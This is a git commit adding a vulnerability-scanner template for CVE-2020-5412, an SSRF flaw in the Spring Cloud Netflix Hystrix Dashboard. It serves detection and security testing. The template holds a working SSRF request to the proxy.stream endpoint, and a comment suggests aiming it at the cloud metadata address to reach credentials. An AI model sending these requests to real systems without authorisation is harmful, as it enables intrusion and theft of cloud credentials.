🔥 Add CVE-2020-5412

patch-1
Dwi Siswanto 2020-09-01 20:24:39 +07:00
parent 3f977fcf62
commit c43cac170c
1 changed files with 25 additions and 0 deletions

25
cves/CVE-2020-5412.yaml Normal file
View File

@ -0,0 +1,25 @@
id: CVE-2020-5412
info:
name: Full-read in Spring Cloud Netflix (Hystrix Dashboard)
author: dwisiswant0
severity: high
description: Spring Cloud Netflix, versions 2.2.x prior to 2.2.4, versions 2.1.x prior to 2.1.6, and older unsupported versions allow applications to use the Hystrix Dashboard proxy.stream endpoint to make requests to any server reachable by the server hosting the dashboard. A malicious user, or attacker, can send a request to other servers that should not be exposed publicly.
requests:
- method: GET
path:
- "{{BaseURL}}/proxy.stream?origin=http://burpcollaborator.net/" # To get crithit, try http://169.254.169.254/latest/metadata/
matchers-condition: and
matchers:
- type: word
words:
- "Burp Collaborator Server"
part: body
- type: word
words:
- "Jelly"
part: header
- type: status
status:
- 200